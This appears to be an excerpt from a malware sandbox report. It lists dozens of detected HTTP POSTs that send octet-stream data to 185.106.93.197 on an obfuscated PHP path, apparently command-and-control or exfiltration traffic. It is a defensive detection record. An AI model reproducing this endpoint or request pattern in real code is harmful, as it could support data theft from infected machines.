Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive

